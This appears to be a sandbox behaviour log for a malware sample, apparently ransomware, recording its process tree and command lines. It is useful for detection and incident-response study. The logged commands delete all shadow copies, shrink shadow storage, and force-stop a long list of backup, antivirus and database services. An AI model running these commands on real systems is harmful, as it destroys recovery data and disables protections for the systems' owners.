PID 1540 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1540 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe C:\Windows\SysWOW64\cmd.exe
PID 1632 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1632 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1632 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe
PID 1632 wrote to memory of 1944 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\vssadmin.exe

Processes

C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe

"C:\Users\Admin\AppData\Local\Temp\79e41bb5b4edef24742f9e376add4bafdb9cbeb9cb8ae256a36df74694d820b9.bin.sample.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=c: /on=c: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=d: /on=d: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=e: /on=e: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=f: /on=f: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=g: /on=g: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=401MB

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=h: /on=h: /maxsize=unbounded

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net.exe

net stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Acronis VSS Provider" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Enterprise Client Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Backup Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLsafe Filter Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Veeam Backup Catalog Data Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcronisAgent /y

C:\Windows\SysWOW64\net.exe

net stop AcronisAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcronisAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net.exe

net stop AcrSch2Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AcrSch2Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Antivirus /y

C:\Windows\SysWOW64\net.exe

net stop Antivirus /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Antivirus /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ARSM /y

C:\Windows\SysWOW64\net.exe

net stop ARSM /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ARSM /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecAgentBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecDeviceMediaService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecJobEngine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecJobEngine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecManagementService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecManagementService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecRPCService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecRPCService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net.exe

net stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop BackupExecVSSProvider /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop bedbg /y

C:\Windows\SysWOW64\net.exe

net stop bedbg /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop bedbg /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop DCAgent /y

C:\Windows\SysWOW64\net.exe

net stop DCAgent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop DCAgent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPSecurityService /y

C:\Windows\SysWOW64\net.exe

net stop EPSecurityService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPSecurityService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EPUpdateService /y

C:\Windows\SysWOW64\net.exe

net stop EPUpdateService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EPUpdateService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net.exe

net stop EraserSvc11710 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EraserSvc11710 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EsgShKernel /y

C:\Windows\SysWOW64\net.exe

net stop EsgShKernel /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EsgShKernel /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop FA_Scheduler /y

C:\Windows\SysWOW64\net.exe

net stop FA_Scheduler /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop FA_Scheduler /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IISAdmin /y

C:\Windows\SysWOW64\net.exe

net stop IISAdmin /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IISAdmin /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop IMAP4Svc /y

C:\Windows\SysWOW64\net.exe

net stop IMAP4Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop IMAP4Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McShield /y

C:\Windows\SysWOW64\net.exe

net stop McShield /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McShield /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop McTaskManager /y

C:\Windows\SysWOW64\net.exe

net stop McTaskManager /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop McTaskManager /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfemms /y

C:\Windows\SysWOW64\net.exe

net stop mfemms /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfemms /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfevtp /y

C:\Windows\SysWOW64\net.exe

net stop mfevtp /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfevtp /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MMS /y

C:\Windows\SysWOW64\net.exe

net stop MMS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MMS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mozyprobackup /y

C:\Windows\SysWOW64\net.exe

net stop mozyprobackup /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mozyprobackup /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net.exe

net stop MsDtsServer110 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MsDtsServer110 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeES /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeES /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeES /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeIS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeIS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeIS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMGMT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMGMT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeMTA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeMTA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSA /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net.exe

net stop MSExchangeSRS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSExchangeSRS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

